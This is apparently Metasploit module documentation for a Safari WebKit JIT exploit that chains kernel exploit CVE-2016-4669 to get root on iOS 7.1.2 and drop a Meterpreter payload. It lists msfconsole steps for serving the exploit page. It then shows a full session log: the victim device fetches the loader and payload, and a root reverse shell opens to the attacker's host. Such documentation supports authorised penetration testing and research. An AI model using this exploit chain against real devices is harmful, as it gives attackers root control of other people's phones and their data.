## Vulnerable Application

This module exploits a JIT optimization bug in Safari Webkit. This allows us to
write shellcode to an RWX memory section in JavaScriptCore and execute it. The
shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw,
obtains root and disables code signing. Finally we download and execute the
meterpreter payload.

This module has been tested against iOS 7.1.2 on an iPhone 4.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/apple_ios/browser/safari_jit`
1. Do: `set lhost [ip]`
1. Do: `set srvhost [ip]`
1. Do: `run`
1. Browse to the website with a vulnerable device
1. You should get a root shell.

## Options

### DEBUG_EXPLOIT

Show debug information during exploitation.  This will add entries to the iPhone syslog related to exploitation and
loading of the payload.  Defaults to `false`

## Scenarios


### iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
```
